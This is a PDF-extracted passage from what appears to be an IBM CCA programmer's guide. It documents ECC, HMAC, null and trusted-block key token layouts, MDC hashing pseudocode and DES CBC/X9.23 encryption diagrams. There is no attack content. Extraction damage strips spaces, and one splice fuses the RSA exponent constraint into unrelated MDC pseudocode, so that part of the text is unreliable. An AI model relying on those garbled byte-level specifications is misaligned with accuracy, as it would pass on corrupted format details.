Ifthissectionisintheclear,itcontainsprivatekeyd. +| section +| Ifthissectionisencrypted,itcontainstheAESKWwrappedpayload. +||| 076+aa bb FormattedsectionwhichincludesPrivatekeyd.See“AESKWwrapped +| payloadformatforECCprivatekeytoken”onpage439. +|| 076+aa+bb Endofformattedsection +| ECCtokenpublicsection +||| 000 001 X'21',sectionidentifier,ECCpublickey +||| 001 001 X'00',version. +||| 002 001 Sectionlength. +AppendixB.Keytokenformats 437 + +Key token formats +| Table133.ECCkeytokenformat (continued) +| Offset +||| (Decimal) Lengthinbytes Description +||| 004 004 Reservedbinaryzero +||| 008 001 Curvetype: +|| X'00' Primecurve +|| X'01' Brainpoolcurve +||| 009 001 Reservedbinaryzero +||| 010 002 Lengthofpinbits +|| X'00A0' Brainpoolp-160 +|| X'00C0' PrimeP-192,BrainpoolP-192 +|| X'00E0' PrimeP-224,BrainpoolP-224 +|| X'0100' PrimeP-256,BrainpoolP-256 +|| X'0140' BrainpoolP-320 +|| X'0180' PrimeP-384,BrainpoolP-384 +|| X'0200' BrainpoolP-512 +|| X'0209' PrimeP-521 +||| 012 002 Thisfieldisthelengthofthepublickeyqvalueinbytes,themaximum +| valuecouldbeupto133bytes,cc.Thevalueincludesthekeymaterial +| lengthandonebytetoindicateifthekeymaterialiscompressedor +| uncompressed. +||| 014 cc PublicKey,qfield +| +Associated data format for ECC private key token +| +| Table134 shows the format of associated data for an ECC private key token in the clear.Associated data +| is data whose integrity but not confidentiality is protected by a key wrap mechanism. +|| Table134.AssociateddataformatforECCprivatekeytoken +| Offset +||| (Decimal) Lengthinbytes Description +||| 000 001 Associateddataversion.0forECC +||| 001 001 LengthofKeylabel,kl +||| 002 002 IBMassociateddatalength,16+kl+xxx +||| 004 002 IBMextendedassociateddatalength,xxx +||| 006 001 Userdefinableassociateddatalength,yyy.Userdefinablelengthsare0- +| 100bytes. +||| 007 001 Curvetype +||| 008 002 Lengthofpinbits +||| 010 001 Usageflag +||| 011 001 Formatandsecurityflag +||| 012 004 Reserved +||| 016 kl Keylabel(optional) +||| 016+kl xxx IBMextendedassociateddata +||| 016+kl+xxx User-definableassociateddata +| +438 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key token formats +AESKW wrapped payload format for ECC private key token +| +| Table135 defines the contents of theAESKW payload. Data will be copied into this format, then encrypted +| with the OPK according to theAESKW specification, and the result will be stored in the encrypted data +| section. +|| Table135.AESKWwrappedpayloadformatforECCprivatekeytoken +| Offset +||| (Decimal) Lengthinbytes Description +||| 000 006 ICV('A6'....) +||| 006 001 Lengthofpaddinginbits +||| 007 001 Lengthofthehashoftheassociateddatainbytes,ii +||| 008 004 Hashoptions +||| 012 ii Hashofassociateddata +||| 012+ii mm Keydata +||| 012+ii+mm 0-7 Paddingtoamultipleof8bytes +| +| +PKA null key token +Table136 shows the format for a PKAnull key token. +Table136.PKAnullkeytokenformat +Bytes Description +0 X'00'Tokenidentifier(indicatesthatthisisanullkeytoken). +1 Version,X'00'. +2-3 X'0008'Lengthofthekeytokenstructure. +4-7 Ignored(shouldbezero). +HMAC key token +| +| HMAC key tokens have two formats, “HMAC variable-length symmetric key token” and “HMAC symmetric +| null key token” on page 443. +HMAC variable-length symmetric key token +| +| Table137 shows the format of the HMAC variable-length symmetric key-token.An HMAC token is used by +| the HMAC Generate(CSNBHMG) and HMAC Verify(CSNBHMV) verbs to generate and verify keyed hash +| MessageAuthentication Codes. +|| Table137.HMACvariable-lengthsymmetrickey-token,versionX'05'(CCA4.1.0orlater) +| Length +||| Offset(bytes) (bytes) Description +| Header +||| 000 01 Tokenidentifier: +|| Value Description +|| X'00' Internalkey-token +|| X'01' Externalkey-token +||| 001 01 Reserved,binaryzero. +AppendixB.Keytokenformats 439 + +Key token formats +| Table137.HMACvariable-lengthsymmetrickey-token,versionX'05'(CCA4.1.0orlater) (continued) +| Length +||| Offset(bytes) (bytes) Description +||| 002 02 Lengthinbytesoftheoveralltokenstructure. +| 54+kl+iead+uad+TLVlengths+((pl+7)/8) +||| 004 01 Tokenversionnumber(X'05'). +||| 005 03 Reserved,binaryzero. +| Endofheader +| Wrappinginformationsection(alldatarelatedtowrappingthetoken) +||| 008 01 Keymaterialstate: +|| Value Description +|| X'00' Nokeypresent(internalorexternal) +|| X'01' Keyisclear(internal) +|| X'02' KeyisencryptedunderaKEK(external) +|| X'03' Keyisencryptedunderthemasterkey(internal) +||| 009 01 Keyverificationpattern(KVP)type: +|| Value Description +|| X'00' NoKVP +|| X'01' AES-MK(8leftmostbytesofSHA-256hash(X'01'||clearAESMK)) +|| X'02' KEKverificationpattern +| Note: Key-wrappingmethodX'03'(PKOAEP2)hasnoKVP. +||| 010 16 KVP. +| Valueisleftjustifiedinthefieldandpaddedontherightwithbinaryzeros. +| Note: Forkey-wrappingmethodX'03'(PKOAEP2),thisvalueisfilledwithbinary +| zeros. +||| 026 01 Encryptedsectionkey-wrappingmethod: +|| Value Description +|| X'00' Clearkey +|| X'02' AESKW +|| X'03' PKOAEP2 +||| 027 01 Hashalgorithmusedforwrapping. +| Forclearkeywrappingmethod(X'00'atoffset26): +|| X'00' Clearkey(nohash) +| ForAESKWwrappingmethod(X'02'atoffset26): +|| X'02' SHA-256 +| ForPKOAEP2wrappingmethod(X'03'atoffset26): +|| Value Description +|| X'01' SHA-1 +|| X'02' SHA-256 +|| X'04' SHA-384 +|| X'08' SHA-512 +||| 028 02 Reserved,binaryzero. +| Endofwrappinginformationsection +| AESKWcomponents:(1)associateddataand(2)optionalclearkeyorencryptedAESKWpayload. +| Associateddatasection +||| 030 01 Associateddatasectionversion(X'01'). +440 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key token formats +| Table137.HMACvariable-lengthsymmetrickey-token,versionX'05'(CCA4.1.0orlater) (continued) +| Length +||| Offset(bytes) (bytes) Description +||| 031 01 Reserved,binaryzero. +||| 032 02 Lengthinbytesoftheassociateddata. +| 24+kl+iead+uad+TLVlengths +||| 034 01 Lengthinbytesofthekeylabel:kl(0or64). +||| 035 01 LengthinbytesoftheIBMextendedassociateddata:iead(0). +||| 036 01 Lengthinbytesoftheuser-definableassociateddata:uad(0-255). +||| 037 01 Reserved,binaryzero. +||| 038 02 Lengthinbitsofthepayload:pl. +| Validvaluesare0whennokeyispresent,80-2048whenkeyisclear,and464- +| 2432whenkeyisencrypted. +||| 040 01 Reserved,binaryzero. +||| 041 01 Typeofalgorithmforwhichthekeycanbeused. +|| X'03' HMAC +||| 042 02 Keytype: +|| X'0002' MAC +||| 044 01 Key-usagefieldscount:kuf(2). +||| 045 02 Key-usagefield1. +| High-orderbyte: +|| Value Description +|| B'1xxxxxxx' Keycanbeusedforgenerate. +|| B'0xxxxxxx' Keycannotbeusedforgenerate. +|| B'x1xxxxxx' Keycanbeusedforverify. +|| B'x0xxxxxx' Keycannotbeusedforverify. +| Allunusedbitsarereservedandmustbezero. +| Low-orderbyte: +|| Value Description +|| B'xxxx1xxx' Thekeycanbeusedonlyinuser-definedextensions(UDXs). +|| B'xxxx0xxx' ThekeycanbeusedinUDXsandCCA. +|| B'xxxxxuuu' ReservedforUDXs,whereuuuareUDX-definedbits. +| Allunusedbitsarereservedandmustbezero. +AppendixB.Keytokenformats 441 + +Key token formats +| Table137.HMACvariable-lengthsymmetrickey-token,versionX'05'(CCA4.1.0orlater) (continued) +| Length +||| Offset(bytes) (bytes) Description +||| 047 02 Key-usagefield2. +| High-orderbyte: +|| Value Description +|| B'1xxxxxxx' SHA-1hashmethodisallowedforthekey. +|| B'0xxxxxxx' SHA-1hashmethodisnotallowedforthekey. +|| B'x1xxxxxx' SHA-224hashmethodisallowedforthekey. +|| B'x0xxxxxx' SHA-224hashmethodisnotallowedforthekey. +|| B'xx1xxxxx' SHA-256hashmethodisallowedforthekey. +|| B'xx0xxxxx' SHA-256hashmethodisnotallowedforthekey. +|| B'xxx1xxxx' SHA-384hashmethodisallowedforthekey. +|| B'xxx0xxxx' SHA-384hashmethodisnotallowedforthekey. +|| B'xxxx1xxx' SHA-512hashmethodisallowedforthekey. +|| B'xxxx0xxx' SHA-512hashmethodisnotallowedforthekey. +| Allunusedbitsarereservedandmustbezero. +| Low-orderbyte:Allbitsarereservedandmustbezero. +||| 049 01 Key-managementfieldscount:kmf(2). +||| 050 02 Key-managementfield1. +| High-orderbyte: +|| Value Description +|| B'1xxxxxxx' Allowexportusingsymmetrictransportkey. +|| B'0xxxxxxx' Prohibitexportusingsymmetrictransportkey. +|| B'x1xxxxxx' Allowexportusingunauthenticatedasymmetrictransportkey. +|| B'x0xxxxxx' Prohibitexportusingunauthenticatedasymmetrictransportkey. +|| B'xx1xxxxx' Allowexportusingauthenticatedasymmetrictransportkey. +|| B'xx0xxxxx' Prohibitexportusingauthenticatedasymmetrictransportkey. +|| B'xxx1xxxx' AllowexporttoTR-31format. +|| B'xxx0xxxx' ProhibitexporttoTR-31format. +|| B'xxxx1xxx' Allowexportinrawformat. +|| B'xxxx0xxx' Prohibitexportinrawformat. +| Allunusedbitsarereservedandmustbezero. +| Low-orderbyte: +|| Value Description +|| B'1xxxxxxx' ProhibitexportusingaDEStransportkey. +|| B'0xxxxxxx' AllowexportusingaDEStransportkey. +|| B'x1xxxxxx' ProhibitexportusinganAEStransportkey. +|| B'x0xxxxxx' AllowexportusinganAEStransportkey. +|| B'xxxx1xxx' ProhibitexportusinganRSAtransportkey. +|| B'xxxx0xxx' AllowexportusinganRSAtransportkey. +|| B'xxxxx1xx' KeycannotbederivedusinganECCkey. +|| B'xxxxx0xx' KeycanbederivedusinganECCkey. +| Allunusedbitsarereservedandmustbezero. +442 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key token formats +| Table137.HMACvariable-lengthsymmetrickey-token,versionX'05'(CCA4.1.0orlater) (continued) +| Length +||| Offset(bytes) (bytes) Description +||| 052 02 Key-managementfield2. +| High-orderbyte: +|| Value Description +|| B'11xxxxxx' Key,ifpresent,isincomplete.Keyrequiresatleast2moreparts. +|| B'10xxxxxx' Key,ifpresent,isincomplete.Keyrequiresatleast1moreparts. +|| B'01xxxxxx' Key,ifpresent,isincomplete.Keycanbecompletedorhavemore +| partsadded. +|| B'00xxxxxx' Key,ifpresent,iscomplete.Nomorepartscanbeadded. +| Allunusedbitsarereservedandmustbezero. +| Low-orderbyte: +| Allbitsarereservedandmustbezero. +||| 054 kl Optionalkeylabel. +||| 054+kl iead IBMextendedassociateddata. +||| 054+kl+iead uad User-definableassociateddata. +| Endofassociateddatasection +| OptionalclearkeyorencryptedAESKWpayload +||| 054+kl+iead+ (pl+7)/8 Clearkeyorencryptedwrapped/encodedpayload. +| uad +| EndofoptionalclearkeyorencryptedAESKWpayload +||| 054+kl+iead+ EndofAESKWcomponents +| uad+(pl+7)/8 +| UnencryptedAESKWpayload(Thisdatawillneverappearintheclearoutsideofthecryptographiccoprocessor) +||| 000 6 Integritycheckvalue.Sixbyteconstant:X'A6A6A6A6A6A6'. +||| 006 1 Lengthofthepaddinginbits:pb +||| 007 1 Lengthofthehashtheassociateddatainbytes:32 +||| 008 4 Hashoptions +||| 012 hoh-4 Hashoftheassociateddata +||| 008+hoh (pl/8)- Keydataandpadding(keydataisleftjustified). +| 8-hoh +||| pl/8 plisthebitlengthofthepayload +| Note: Allnumbersareinbigendianformat. +| +HMAC symmetric null key token +| +| Table138 shows the format of the HMAC symmetric null key token. +|| Table138.HMACsymmetricnullkeytokenformat +| Length +||| Offset(bytes) (bytes) Description +| Header +||| 0 1 X'00'Tokenidentifier,whichindicatesthatthisisanullkeytoken. +||| 1 1 X'00'Version +AppendixB.Keytokenformats 443 + +Key token formats +| Table138.HMACsymmetricnullkeytokenformat (continued) +| Length +||| Offset(bytes) (bytes) Description +||| 2-3 2 X'0008'Lengthofthekeytokenstructure. +||| 4.-7 4 Ignored(zero). +| +| +Trusted blocks +Akey token is a data structure that contains information about a key and usually contains a key or keys. +| Atrusted block is an extension of CCAkey tokens using new section identifiers.Atrusted block was +| introduced to CCAbeginning with Release 3.25. Trusted blocks are an integral part of a remote +| key-loading process. See “Remote key loading” on page 34. +In general, a key that is available to an application program or held in key storage is multiply-enciphered +by some other key. When a key is enciphered by the CCAnode's master key, the key is designated an +internal key and is held in an internal key-token structure. Therefore, an internal key token or internal +trusted block is used to hold a key and its related information for use at a specific CCAnode. +An external key token or external trusted block is used to communicate a key between nodes, or to hold a +key in a form not enciphered by a CCAmaster key. DES keys and PKAprivate-keys contained in an +external key-token or external trusted block are multiply-enciphered by a transport key. In a CCA-node, a +transport key is a double-length DES key encrypting key (KEK). +Trusted blocks contain various items, some of which are optional, and some of which can be present in +different forms. Tokens are composed of concatenated sections that, unlike CCAPKAkey tokens, occur in +no prescribed order. +As with other CCAkey-tokens, both internal and external forms are defined: +v An external trusted block contains a randomly generated confounder and a triple-length MAC key +enciphered under a DES IMP-PKAtransport key. The MAC key is used to calculate an ISO 16609 CBC +mode TDES MAC of the trusted block contents.An external trusted block is created by the Trusted +Block Create verb. This verb can: +1. Create an inactive external trusted block +2. Change an external trusted block from inactive to active +v An internal trusted block contains a confounder and triple-length MAC key enciphered under a variant of +the PKAmaster key. The MAC key is used to calculate a TDES MAC of the trusted block contents.A +PKAmaster-key verification pattern is also included to enable determination that the proper master key +is available to process the key. The Remote Key Export verb only operates on trusted blocks that are +internal.An internal trusted block must be imported from an external trusted block that is active using +the PKAKey Import verb. +Note: Trusted blocks do not contain a private key section. +Trusted block organization +| Atrusted block is a concatenation of a header followed by an unordered set of sections. Some elements +| are required, while others are optional. The data structures of these sections are summarized in Table139. +Table139.Trustedblocksectionsandtheiruse +Section Reference Usage +Header Table140onpage446 Trustedblocktokenheader +X'11' Table141onpage447 Trustedblockpublickey +444 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key token formats +Table139.Trustedblocksectionsandtheiruse (continued) +Section Reference Usage +X'12' Table142onpage448 Trustedblockrule +X'13' Table149onpage455 Trustedblockname(keylabel) +X'14' Table150onpage455 Trustedblockinformation +X'15' Table154onpage457 Trustedblockapplication-defineddata +Every trusted block starts with a token header. The first byte of the token header determines the key form: +v An external header (first byte X'1E'), created by the Trusted Block Create verb +v An internal header (first byte X'1F'), imported from an active external trusted block by the PKAKey +Import verb +Following the token header of a trusted block is an unordered set of sections.Atrusted block is formed by +concatenating these sections to a trusted block header: +v An optional public-key section (trusted block section identifier X'11') +The trusted block trusted RSApublic key section includes the key itself in addition to a key-usage flag. +No multiple sections are allowed. +v An optional rule section (trusted block section identifier X'12') +Atrusted block can have zero or more rule sections. +1. Atrusted block with no rule sections can be used by the PKAKey Token Change and PKAKey +Import verbs.Atrusted block with no rule sections can also be used by the Digital Signature Verify +verb, provided there is an RSApublic key section that has its key-usage flag bits set to allow digital +signature operations. +2. At least one rule section is required when the Remote Key Export verb is used to: +– Generate an RKX key-token +– Export an RKX key-token +– Export a CCADES key-token +– Encrypt the clear generated or exported key using the provided vendor certificate +3. If a trusted block has multiple rule sections, each rule section must have a unique 8-character Rule +ID. +v An optional name (key label) section (trusted block section identifier X'13') +The trusted block name section provides a 64-byte variable to identify the trusted block, just as key +labels are used to identify other CCAkeys. This name, or label, enables a host access-control system +such as RACF® to use the name to verify that the application has authority to use the trusted block. No +multiple sections are allowed. +v Arequired information section (trusted block section identifier X'14') +The trusted block information section contains control and security information related to the trusted +block. The information section is required while the others are optional. This section contains the +cryptographic information that guarantees its integrity and binds it to the local system. No multiple +sections are allowed. +v An optional application-defined data section (trusted block section identifier X'15') +The trusted block application-defined data section can be used to include application-defined data in the +trusted block. The purpose of the data in this section is defined by the application. CCAdoes not +examine or use this data in any way. No multiple sections are allowed. +Trusted block integrity +An enciphered confounder and triple-length MAC key contained within the required information section of +the trusted block is used to protect the integrity of the trusted block. The randomly generated MAC key is +AppendixB.Keytokenformats 445 + +Key token formats +used to calculate an ISO 16609 CBC mode TDES MAC of the trusted block contents. Together, the MAC +key and MAC value provide a way to verify that the trusted block originated from an authorized source, +and binds it to the local system. +An external trusted block has its MAC key enciphered under an IMP-PKAkey-encrypting key.An internal +trusted block has its MAC key enciphered under a variant of the PKAmaster key, and the master-key +verification pattern is stored in the information section. +Number representation in trusted blocks +v All length fields are in binary +v All binary fields (exponents, lengths, and so forth) are stored with the high-order byte first (left, +low-address, z/OS format); thus the least significant bits are to the right and preceded with zero-bits to +the width of a field +v In variable-length binary fields that have an associated field-length value, leading bytes that would +otherwise contain X'00' can be dropped and the field shortened to contain only the significant bits +Trusted block sections +| +At the beginning of every trusted block is a trusted block header. The header contains the following +information: +v Atoken identifier, which specifies if the token contains an external or internal key-token +v Atoken version number to allow for future changes +v Alength in bytes of the trusted block, including the length of the header +The trusted block header is defined in Table140. +Table140.Trustedblockheaderformat +Offset(bytes) Length(bytes) Description +000 001 Tokenidentifier(aflagthatindicatestokentype) +Value Description +X'1E' Externaltrustedblocktoken +X'1F' Internaltrustedblocktoken +001 001 Tokenversionnumber(X'00'). +002 002 Lengthofthekey-tokenstructureinbytes. +004 004 Reserved,binaryzero. +Note: See “Number representation in trusted blocks.” +Following the header, in no particular order, are trusted block sections. There are five different sections +defined, each identified by a one-byte section identifier (X'11' - X'15'). Two of the five sections have +subsections defined.Asubsection is a tag-length-value (TLV) object, identified by a two-byte subsection +tag. +Only sections X'12' and X'14' have subsections defined; the other sections do not.Asection and its +subsections, if any, are one contiguous unit of data. The subsections are concatenated to the related +section, but are otherwise in no particular order. +Section X'12' has five subsections defined (X'0001' - X'0005'). Section X'14' has two subsections, (X'0001' +and X'0002'). Of all the subsections, only subsection X'0001' of section X'14' is required. Section X'14' is +also required. +The trusted block sections and subsections are described in detail in the following topics. +446 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key token formats +Trusted block section X'11' +Trusted block section X'11' contains the trusted RSApublic key in addition to a key-usage flag indicating +whether the public key is usable in key-management operations, digital signature operations, or both. +Section X'11' is optional. No multiple sections are allowed. It has no subsections defined. +This section is defined in Table141. +Table141.TrustedblocktrustedRSApublickeysection(X'11') +Offset(bytes) Length(bytes) Description +000 001 Sectionidentifier: +X'11' TrustedblocktrustedRSApublickey +001 001 Sectionversionnumber(X'00'). +002 002 Sectionlength(16+xxx+yyy). +004 002 Reserved,mustbebinaryzero. +006 002 RSApublickeyexponentfieldlengthinbytes,xxx. +008 002 RSApublickeymoduluslengthinbits. +010 002 RSApublickeymodulusfieldlengthinbytes,yyy. +012 xxx Publickeyexponent,e(thisfieldlengthistypically1,3,or64-512bytes).emust +beoddand1≤e, T8, OUT1, OUT2) +Set KEY1 := OUT1 +Set KEY2 := OUT2 +End do +Set output MDC := (KEY1 || KEY2) +End procedure +MDC-4 MDC-4(n, text, KEY1, KEY2, MDC); +For i := 1, 2, ..., n do +Call MDC-1(KEY1, KEY2, T8, T8, OUT1, OUT2) +Set KEY1int := OUT1 +Set KEY2int := OUT2 +Call MDC-1(KEY1int, KEY2int, KEY2, KEY1, OUT1, OUT2) +Set KEY1 := OUT1 +Set KEY2 := OUT2 +End do +Set output MDC := (KEY1 || KEY2) +End procedure +Notation: +eK(X) DESencryptionofplaintextXusingkeyK +|| Concatenationoperation +XOR Exclusive-ORoperation +:= Assignmentoperation +T8<1> First8-byteblockoftext +T8<2> Second8-byteblockoftext +KD1,KD2 64-bitquantities +IN1,IN2 64-bitquantities +OUT1,OUT2 64-bitquantities +n Numberof8-byteblocks +Ciphering methods +The Data Encryption Standard (DES) algorithm defines operations on 8-byte data strings. The DES +algorithm is used in many different processes within CCA: +v Encrypting and decrypting general data +v Triple-encrypting and triple-decrypting PIN blocks +v Triple-encrypting and triple-decrypting CCADES keys +v Triple-encrypting and triple-decrypting RSAprivate keys with several processes +v Deriving keys, hashing data, generating CVV values, and so forth +494 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +The Encipher and Decipher verbs describe how you can request encryption or decryption of application +data. See the following topic: “General data-encryption processes” for a description of the two +standardized processes you can use. +In CCA, PIN blocks are encrypted with double-length keys. The PIN block is encrypted with the left-half +key, for which the result is decrypted with the right-half key and this result is encrypted with the left-half +key. +See “Triple-DES ciphering algorithms” on page 498 and “Ciphering methods” on page 494, which describe +how CCADES keys are enciphered. +General data-encryption processes +Although the fundamental concepts of enciphering and deciphering data are simple, different methods +exist to process data strings that are not a multiple of eight bytes in length. Two widely used methods for +enciphering general data are defined in theseANSI standards: +v ANSI X3.106 cipher block chaining (CBC) +v ANSI X9.23 +These methods also differ in how they define the initial chaining value (ICV). +This section describes how the Encipher and Decipher verbs implement these methods. +Single-DES and Triple-DES encryption algorithms for general data +Using the CEX3C and CEX2C, you can use the triple-DES algorithm in addition to the classical +single-DES algorithm. In the subsequent descriptions of the CBC method andANSI X9.23 method, the +actions of the Encipher and Decipher verbs encompass both single-DES and triple-DES algorithms. The +triple-DES processes are depicted in Figure18 where “left key” and “right key” refer to the two halves of a +double-length DES key. +Cleartext, 8 bytes Ciphertext, 8 bytes +────────┬───────── ─────────┬───────── +│ │ +(cid:14) (cid:14) +┌───────────────────┐ ┌───────────────────┐ +│ │ │ │ +Left key──────(cid:6)│ Encipher │ Left key──────(cid:6)│ Decipher │ +│ │ │ │ +└─────────┬─────────┘ └─────────┬─────────┘ +│ │ +(cid:14) (cid:14) +┌───────────────────┐ ┌───────────────────┐ +│ │ │ │ +Right key─────(cid:6)│ Decipher │ Right key─────(cid:6)│ Encipher │ +│ │ │ │ +└─────────┬─────────┘ └─────────┬─────────┘ +│ │ +(cid:14) (cid:14) +┌───────────────────┐ ┌───────────────────┐ +│ │ │ │ +Left key──────(cid:6)│ Encipher │ Left key──────(cid:6)│ Decipher │ +│ │ │ │ +└─────────┬─────────┘ └─────────┬─────────┘ +│ │ +(cid:14) (cid:14) +Ciphertext Cleartext +Figure18.Triple-DESdataencryptionanddecryption +AppendixF.Cryptographicalgorithmsandprocesses 495 + +ANSI X3.106 Cipher Block Chaining (CBC) method +ANSI standard X3.106 defines four modes of operation for ciphering. One of these modes, Cipher Block +Chaining (CBC), defines the basic method for ciphering multiple 8-byte data strings. Figure19 and +Figure20 on page 497 show CBC using the Encipher and Decipher verbs.Aplaintext data string that must +be a multiple of eight bytes is processed as a series of 8-byte blocks. The ciphered result from processing +an 8-byte block is XORed with the next block of 8 input bytes. The last 8-byte ciphered result is defined as +an output chaining value (OCV). The security server stores the OCV in bytes 0 - 7 of the chaining_vector +variable. +An ICV is XORed with the first block of eight bytes. When you call the Encipher or Decipher verb, specify +the INITIAL or CONTINUE keywords. If you specify the INITIAL keyword, the default, the initialization +vector from the verb parameter is XORed with the first eight bytes of data. If you specify the CONTINUE +keyword, the OCV identified by the chaining_vector parameter is XORed with the first eight bytes of data. +┌──────────────┐ +│Verb parameter│ +└──────┬───────┘ +│ +┌──────(cid:14)───────┐ (cid:17)────── Plaintext from application program ────────────(cid:6) +│Initialization│ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ +│ vector │ │ Data (1,8) │ │ Data (9,16) │ │Data (N*8─7,N*8)│ +└──────┬───────┘ └───────┬────────┘ └───────┬────────┘ └───────┬────────┘ +│INITIAL │ │ │ +│keyword │ │ │ +(cid:14) ┌───┐ ┌─(cid:14)─┐ ┌─(cid:14)─┐ ┌─(cid:14)─┐ +or───(cid:6)ICV├──────(cid:6)XOR│ ┌──────(cid:6)XOR│ ┌ ─ ───(cid:6)XOR│ +(cid:18) └───┘ └─┬─┘ │ └─┬─┘ └─┬─┘ +│CONTINUE │ │ │ │ +│keyword ┌─────(cid:14)─────┐ │ ┌─────(cid:14)─────┐ │ ┌─────(cid:14)─────┐ +│ │ Encipher │ │ │ Encipher │ │ Encipher │ +│ └─────┬─────┘ │ └─────┬─────┘ │ └─────┬─────┘ +│ │ │ │ │ ┌───┐ +│ ├─────────┘ ├────── ─ ┘ ├─────────────(cid:6)OCV│ +│ │ │ │ └─┬─┘ +│ ┌───────(cid:14)────────┐ ┌───────(cid:14)────────┐ ┌───────(cid:14)────────┐ │ +│ │ Data (1,8) │ │ Data (9,16) │ │Data (N*8─7,N*8)│ │ +│ └────────────────┘ └────────────────┘ └────────────────┘ │ +│ (cid:17)───────── Ciphertext to application program ──────────(cid:6) │ +│ ┌────────(cid:14)──────┐ +└──────────────────────────────────────────────────────────────┤Chaining vector│ +└───────────────┘ +Figure19.EncipheringusingtheANSIX3.106CBCmethod +496 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +┌──────────────┐ +│Verb parameter│ +└──────┬───────┘ +│ +┌──────(cid:14)───────┐ (cid:17)──────── Ciphertext from application program ─────────(cid:6) +│Initialization│ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ +│ vector │ │ Data (1,8) │ │ Data (9,16) │ │Data (N*8─7,N*8)│ +└──────┬───────┘ └───────┬────────┘ └───────┬────────┘ └───────┬────────┘ +│ │ │ │ ┌───┐ +│ ├─────────┐ ├────── ─ ┐ ├─────────────(cid:6)OCV│ +│ │ │ │ │ └─┬─┘ +│ ┌─────(cid:14)─────┐ │ ┌─────(cid:14)─────┐ │ ┌─────(cid:14)─────┐ │ +│ │ Decipher │ │ │ Decipher │ │ Decipher │ │ +│INITIAL └─────┬─────┘ │ └─────┬─────┘ │ └─────┬─────┘ │ +│keyword │ │ │ │ │ +(cid:14) ┌───┐ ┌─(cid:14)─┐ │ ┌─(cid:14)─┐ ┌─(cid:14)─┐ │ +or───(cid:6)ICV├──────(cid:6)XOR│ └──────(cid:6)XOR│ └ ─ ───(cid:6)XOR│ │ +(cid:18) └───┘ └─┬─┘ └─┬─┘ └─┬─┘ │ +│CONTINUE │ │ │ │ +│keyword │ │ │ │ +│ ┌───────(cid:14)────────┐ ┌───────(cid:14)────────┐ ┌───────(cid:14)────────┐ │ +│ │ Data (1,8) │ │ Data (9,16) │ │Data (N*8─7,N*8)│ │ +│ └────────────────┘ └────────────────┘ └────────────────┘ │ +│ (cid:17)──────── Plaintext to application program ────────────(cid:6) │ +│ ┌────────(cid:14)──────┐ +└──────────────────────────────────────────────────────────────┤Chaining vector│ +└───────────────┘ +Figure20.DecipheringusingtheCBCmethod +ANSI X9.23 cipher block chaining +ANSI X9.23 defines an enhancement to the basic cipher block chaining (CBC) mode ofANSI X3.106 so +that the system can process data with a length that is not an exact multiple of eight bytes. TheANSI X9.23 +method always appends from 1 - 8 bytes to the plaintext before encipherment. The last appended byte is +the count of the added bytes and is in the range of X'01' - X'08'. The standard defines that any other +added bytes, or pad characters, be random. +When the coprocessor enciphers the plaintext, the resulting ciphertext is always 1 - 8 bytes longer than +the plaintext. See Figure21 on page 498. This is true even if the length of the plaintext is a multiple of +eight bytes. When the coprocessor deciphers the ciphertext, it uses the last byte of the deciphered data as +the number of bytes to remove from the end (pad bytes, if any, and count byte). The result is the original +plaintext. See Figure22 on page 498. +The output chaining vector can be used as feedback with this method in the same way as with the X3.106 +method. +TheANSI X9.23 method requires the caller to supply an initialization vector, and it does not allow +specification of a pad character. +Note: TheANSI X9.23 standard has been withdrawn, but the X9.23 padding method is retained in CCA +for compatibility with applications that rely on this method. +AppendixF.Cryptographicalgorithmsandprocesses 497 + +┌──────────────┐ +│Verb parameter│ +└──────┬───────┘ +│ +┌──────(cid:14)───────┐ (cid:17)── Plaintext from application program ───(cid:6) +│Initialization│ ┌────────────────┐ ┌────────────────┐ ┌────┬─────┬─────┐ +│ vector │ │ Data (1,8) │ │Data (N*8─7,N*8)│ │Data│ Pad │Count│ +└──────┬───────┘ └───────┬────────┘ └───────┬────────┘ └────┴──┬──┴─────┘ +│ │ │ │ +│ ┌─(cid:14)─┐ ┌─(cid:14)─┐ ┌─(cid:14)─┐ +└───────────────(cid:6)XOR│ ┌ ─ ───(cid:6)XOR│ ┌──────(cid:6)XOR│ +└─┬─┘ └─┬─┘ │ └─┬─┘ +│ │ │ │ │ +│ │ │ │ +┌─────(cid:14)─────┐ │ ┌─────(cid:14)─────┐ │ ┌─────(cid:14)─────┐ +│ Encipher │ │ Encipher │ │ │ Encipher │ +└─────┬─────┘ │ └─────┬─────┘ │ └─────┬─────┘ +│ │ │ │ +├────── ─ ┘ ├─────────┘ │ +│ │ │ +┌───────(cid:14)────────┐ ┌───────(cid:14)────────┐ ┌───────(cid:14)────────┐ +│ Data (1,8) │ │Data (N*8─7,N*8)│ │ Last block │ +└────────────────┘ └────────────────┘ └────────────────┘ +(cid:17)─────── Ciphertext to application program ────────────(cid:6) +Figure21.EncipheringusingtheANSIX9.23method +┌──────────────┐ +│Verb parameter│ +└──────┬───────┘ +│ +┌──────(cid:14)───────┐ (cid:17)──────── Ciphertext from application program ─────────(cid:6) +│Initialization│ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ +│ vector │ │ Data (1,8) │ │Data (N*8─7,N*8)│ │ Last block │ +└──────┬───────┘ └───────┬────────┘ └───────┬────────┘ └───────┬────────┘ +│ │ │ │ +│ ├────── ─ ┐ ├─────────┐ │ +│ │ │ │ │ +│ ┌─────(cid:14)─────┐ │ ┌─────(cid:14)─────┐ │ ┌─────(cid:14)─────┐ +│ │ Decipher │ │ Decipher │ │ │ Decipher │ +│ └─────┬─────┘ │ └─────┬─────┘ │ └─────┬─────┘ +│ │ │ │ │ +│ ┌─(cid:14)─┐ │ ┌─(cid:14)─┐ │ ┌─(cid:14)─┐ +└───────────────(cid:6)XOR│ └ ─ ───(cid:6)XOR│ └──────(cid:6)XOR│ +└─┬─┘ └─┬─┘ └─┬─┘ +│ │ │ +┌───────(cid:14)────────┐ 